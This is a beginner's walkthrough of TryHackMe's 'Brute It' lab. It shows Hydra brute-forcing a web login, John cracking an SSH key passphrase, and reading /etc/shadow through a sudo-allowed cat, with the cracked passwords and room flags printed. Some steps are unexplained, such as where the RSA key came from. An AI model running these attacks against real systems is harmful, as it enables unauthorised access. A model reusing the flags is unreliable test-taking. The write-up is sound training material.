TryHackMe “Brute It” Lab Walkthrough
By Adhith

Introduction
Cybersecurity labs are one of the best ways to learn practical hacking skills. In this report, I will explain my walkthrough of the Brute It room on TryHackMe.

This lab focuses on:

Enumeration
Brute-force attacks
Gaining initial access
Privilege escalation
The goal of the room is to discover credentials using brute-force techniques and escalate privileges to gain full system access.

Lab Setup
Before starting the lab, I connected to the TryHackMe VPN and accessed the target machine provided in the room.

Tools used during the lab:

Nmap
Hydra
Gobuster
SSH
Linux privilege escalation techniques
Step 1: Scanning the Target
The first step was to scan the target machine to find open ports.

Example command:

nmap -sC -A -Pn <target-ip>
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-12 11:23 +0530
Nmap scan report for 10.48.158.35
Host is up (0.041s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
|   256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_  256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.98%E=4%D=3/12%OT=22%CT=1%CU=44048%PV=Y%DS=3%DC=T%G=Y%TM=69B2550
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=105%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%
OS:CI=Z%II=I%TS=A)SEQ(SP=105%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=106%G
OS:CD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M4E8ST11NW6%O2=M4E8ST11NW6%O3=M4
OS:E8NNT11NW6%O4=M4E8ST11NW6%O5=M4E8ST11NW6%O6=M4E8ST11)WIN(W1=F4B3%W2=F4B3
OS:%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M4E8NNSNW6%C
OS:C=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%
OS:T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD
OS:=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S
OS:=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK
OS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 587/tcp)
HOP RTT      ADDRESS
1   36.72 ms 192.168.128.1
2   ...
3   37.27 ms 10.48.158.35

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.57 seconds
The scan revealed open ports including:

22 (SSH)
80 (HTTP)
This indicated that the machine had a web server and SSH service running.

Step 2: Web Enumeration
Next, I visited the web server in a browser using the target IP address.

The webpage contained a login form. This suggested that a brute-force attack might work to obtain credentials.

To find hidden directories, I used dirsearch.

Example command:

dirsearch -u http://<target-ip>/

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                     
                                                                                                                                                                                                                                            
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_10.48.158.35/__26-03-12_11-24-41.txt

Target: http://10.48.158.35/

[11:24:41] Starting:                                                                                                                                                                                                                        
[11:24:45] 403 -  277B  - /.ht_wsr.txt                                      
[11:24:45] 403 -  277B  - /.htaccess.bak1                                   
[11:24:45] 403 -  277B  - /.htaccess.orig                                   
[11:24:45] 403 -  277B  - /.htaccess.save                                   
[11:24:45] 403 -  277B  - /.htaccess.sample
[11:24:45] 403 -  277B  - /.htaccess_orig
[11:24:45] 403 -  277B  - /.htaccess_extra
[11:24:45] 403 -  277B  - /.htaccess_sc
[11:24:45] 403 -  277B  - /.htaccessBAK
[11:24:45] 403 -  277B  - /.htaccessOLD
[11:24:45] 403 -  277B  - /.htaccessOLD2
[11:24:45] 403 -  277B  - /.htm                                             
[11:24:45] 403 -  277B  - /.html
[11:24:45] 403 -  277B  - /.htpasswd_test                                   
[11:24:45] 403 -  277B  - /.htpasswds                                       
[11:24:45] 403 -  277B  - /.httr-oauth                                      
[11:24:47] 403 -  277B  - /.php                                             
[11:24:49] 301 -  312B  - /admin  ->  http://10.48.158.35/admin/            
[11:24:50] 200 -  385B  - /admin/                                           
[11:24:50] 200 -  385B  - /admin/index.php                                  
[11:25:21] 403 -  277B  - /server-status                                    
[11:25:21] 403 -  277B  - /server-status/                                   
                                                                             
Task Completed  
This helped discover additional directories that could contain useful information. /admin

Step 3: Brute Force Attack
Since the room is about brute-forcing credentials, I used Hydra to attempt a password brute-force attack.

Become a Medium member
Example command:

hydra -l admin -P /usr/share/wordlists/rockyou.txt <target-ip> http-post-form "/admin/:user=admin&pass=^PASS^:invalid"
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-12 11:33:02
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.48.158.35:80/admin/:user=admin&pass=^PASS^:invalid
[80][http-post-form] host: 10.48.158.35   login: admin   password: xavier
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-12 11:33:16
After running Hydra for some time, valid login credentials were discovered. Password and user name is admin:xavier

Step 4: Gaining Initial Access
Using the discovered credentials, I logged into the machine using SSH.

ssh2john rsa_key.txt > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
 john --wordlist=/usr/share/wordlists/rockyou.txt idrsah.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
rockinroll       (idrsa.txt)     
1g 0:00:00:00 DONE (2026-03-12 11:36) 20.00g/s 1452Kp/s 1452Kc/s 1452KC/s saloni..rock14
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
chmod 600 rsa_key.txt
ssh -i rsa_key.txt john@<target-ip>
 ssh john@10.48.171.248 -i rsa_key.txt
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Enter passphrase for key 'rsa_key.txt': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Mar 12 06:18:27 UTC 2026

  System load:  0.07               Processes:           113
  Usage of /:   25.7% of 19.56GB   Users logged in:     0
  Memory usage: 41%                IP address for ens5: 10.48.171.248
  Swap usage:   0%


63 packages can be updated.
0 updates are security updates.


After logging in successfully, I gained initial access to the system.

Inside the system, I explored files and directories to find the user flag.THM{a_password_is_not_a_barrier}

Step 5: Privilege Escalation
To gain root privileges, I checked for misconfigurations.

One useful command is:

sudo -l
john@bruteit:~$ sudo -l
Matching Defaults entries for john on bruteit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on bruteit:
    (root) NOPASSWD: /bin/cat
sudo cat /etc/shadow
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
use john the ripper tool to crack the hash
root  password is football
 su root 
Password: football
root@bruteit:/home/john# ls
user.txt
root@bruteit:/home/john# cd /root
root@bruteit:~# ls
root.txt
root@bruteit:~# nano root.txt 
root@bruteit:~# cat root.txt 
THM{pr1v1l3g3_3sc4l4t10n}
This command shows which programs can be run with sudo permissions.

Using the available permissions, I exploited the misconfiguration and escalated privileges to root.

Finally, I was able to retrieve the root flag THM{pr1v1l3g3_3sc4l4t10n} , completing the challenge.

Lessons Learned
From this lab, I learned several important cybersecurity concepts:

Importance of enumeration
How brute-force attacks work
Using tools like Hydra and Nmap
Basic privilege escalation techniques
These skills are fundamental for penetration testing and ethical hacking.

Conclusion
The Brute It room on TryHackMe is a great beginner-friendly challenge that teaches the basics of brute-force attacks and system exploitation.

Practicing labs like this helps develop real-world cybersecurity skills and improves understanding of how attackers exploit weak credentials.

I recommend this room to anyone starting their journey in ethical hacking.

Hackthebox Writeup
Brute Force
Hackthebox
